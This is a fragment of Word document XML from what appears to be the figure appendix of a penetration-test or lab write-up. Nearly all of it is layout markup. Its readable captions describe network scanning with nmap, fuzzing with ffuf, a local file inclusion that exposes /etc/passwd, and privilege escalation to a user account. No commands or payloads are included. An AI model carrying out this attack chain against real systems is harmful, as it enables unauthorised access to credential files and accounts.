          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalate Privileges to Sopot Account</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21950CFC" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30AB463E" w14:textId="77777777" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="00DB53DF" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E35588" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCF8E5C" w14:textId="3067C452" w:rsidR="008F7A55" w:rsidRPr="00D77DFE" w:rsidRDefault="008F7A55" w:rsidP="005F3C61">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23ABC5CA" wp14:editId="03CED255">
            <wp:extent cx="4580626" cy="3681730"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16330235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103">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="15164"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4580626" cy="3681730"/>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86" w:name="resource62"/>
    <w:p w14:paraId="252B5AEC" w14:textId="5725781F" w:rsidR="00DB53DF" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00512AA9">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"paragraph62"</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A.44</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>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crontab Jobs on the System</w:t>
      </w:r>
      <w:bookmarkStart w:id="287" w:name="resource64"/>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="287"/>
    <w:p w14:paraId="3C3911CF" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="00FE5290">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AA17B6" w14:textId="536DF411" w:rsidR="008F7A55" w:rsidRPr="00D77DFE" w:rsidRDefault="00406886" w:rsidP="00FE5290">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EF339FB" wp14:editId="6571A258">
            <wp:extent cx="4175185" cy="2774950"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="148278930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rotWithShape="1">
                    <a:blip r:embed="rId104" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="16087"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4175408" cy="2775098"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06754045" w14:textId="5BA61A0E" w:rsidR="00406886" w:rsidRPr="00D77DFE" w:rsidRDefault="0040688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t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B3821" w14:textId="05E58542" w:rsidR="00406886" w:rsidRPr="00D77DFE" w:rsidRDefault="0040688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t>....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0A5BEB" w14:textId="7CFE3CB0" w:rsidR="00406886" w:rsidRPr="00D77DFE" w:rsidRDefault="0040688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289D056" wp14:editId="381E37E5">
            <wp:extent cx="3380133" cy="764614"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17468560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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3381375" cy="764895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38FC46" w14:textId="537E1A66"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hyperlink w:anchor="paragraph64" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.45:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap Scanning for Network Sweep</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19506508" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00406886">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0EC2DF" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D297501" w14:textId="11C77636" w:rsidR="00406886" w:rsidRPr="00D77DFE" w:rsidRDefault="0040688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6DD91A7" wp14:editId="21846778">
            <wp:extent cx="3795024" cy="1269614"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="11127908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rotWithShape="1">
                    <a:blip r:embed="rId106">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="12608"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3824616" cy="1279514"/>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88" w:name="resource65"/>
    <w:p w14:paraId="3D63798A" w14:textId="27C78C6E" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C6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"paragraph65"</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A.46:</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Nmap Scanning for Open Ports</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="288"/>
    <w:p w14:paraId="69484145" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00406886">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263CA13B" w14:textId="77777777" w:rsidR="00C047BB" w:rsidRPr="00D77DFE" w:rsidRDefault="00C047BB" w:rsidP="00C047BB">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31601FB0" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="00C047BB">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF5026D" w14:textId="44C76AFC" w:rsidR="00C047BB" w:rsidRPr="00D77DFE" w:rsidRDefault="00C047BB" w:rsidP="00512AA9">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7C6AEC37" wp14:editId="78317964">
            <wp:extent cx="4152900" cy="1604630"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="185022933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r="15908"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4198162" cy="1622119"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD22100" w14:textId="16915E17" w:rsidR="00D815B8" w:rsidRDefault="00512AA9" w:rsidP="00512AA9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C3CB2" w14:textId="755D7158" w:rsidR="00C047BB" w:rsidRPr="00D77DFE" w:rsidRDefault="00C047BB" w:rsidP="00512AA9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="161C9BAF" wp14:editId="4EE1DFEA">
            <wp:extent cx="4210050" cy="1133406"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211808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87049" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId108"/>
                    <a:srcRect r="16606"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4220177" cy="1136132"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="289" w:name="resource66"/>
    <w:p w14:paraId="0C61A004" w14:textId="2D63157B" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0"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"paragraph66"</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A.47:</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bookmarkEnd w:id="289"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tool for Fuzzing</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8FF192" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00C047BB">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C2CD7D" w14:textId="5C208D77" w:rsidR="00C047BB" w:rsidRPr="00D77DFE" w:rsidRDefault="00C047BB"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6DC40A0F" wp14:editId="20EDE7FA">
            <wp:extent cx="4421173" cy="2044461"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124300767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439298" cy="2052843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="290" w:name="resource67"/>
    <w:p w14:paraId="28454468" w14:textId="4D3BC807" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0"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"paragraph67"</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A.48</w:t>
      </w:r>
      <w:bookmarkEnd w:id="290"/>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 Main Page on ServerMeta</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012B2C34" w14:textId="77777777" w:rsidR="007A78B0" w:rsidRPr="00D77DFE" w:rsidRDefault="007A78B0" w:rsidP="00C047BB">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A62BF2"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bookmarkStart w:id="291" w:name="resource68"/>
    </w:p>
    <w:p w14:paraId="0E74DD5F"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p>
    <w:p w14:paraId="048B804D"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p>
    <w:p w14:paraId="3BB4503C"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p>
    <w:p w14:paraId="482D45B1"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p>
    <w:p w14:paraId="59ACDFB1"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p>
    <w:bookmarkEnd w:id="291"/>
    <w:p w14:paraId="2FECE463" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EFC9FFB" w14:textId="018A4104" w:rsidR="00020D71" w:rsidRPr="00D77DFE" w:rsidRDefault="00020D7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3CC4841" wp14:editId="139A48F7">
            <wp:extent cx="4287328" cy="1972945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="76167545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r="20596"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4287328" cy="1972945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F20E6C" w14:textId="0975A52A" w:rsidR="00D815B8" w:rsidRDefault="007A78B0" w:rsidP="00512AA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6145"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph68" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.49:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Listing Archived Articles on ServerMeta</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6CE580" w14:textId="4C5848EA" w:rsidR="00020D71" w:rsidRPr="00D77DFE" w:rsidRDefault="00020D7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32993AAE" wp14:editId="14E372BD">
            <wp:extent cx="4275568" cy="4520242"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="125776813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60">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="11809"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4280697" cy="4525664"/>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92" w:name="resource69"/>
    <w:p w14:paraId="4AFD6927" w14:textId="014DEFF6" w:rsidR="00D815B8" w:rsidRDefault="007A78B0" w:rsidP="00512AA9">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"paragraph69"</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A.50</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w:t>
      </w:r>
      <w:bookmarkEnd w:id="292"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LFI Leading to Expose /etc/passwd from Archived Articles</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E813723" w14:textId="32FA64E5" w:rsidR="00020D71" w:rsidRPr="00D77DFE" w:rsidRDefault="00020D71" w:rsidP="007A78B0">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27846E1E" wp14:editId="2188DFE6">
            <wp:extent cx="4002213" cy="2716815"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="208409425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62">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="12128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4009263" cy="2721601"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
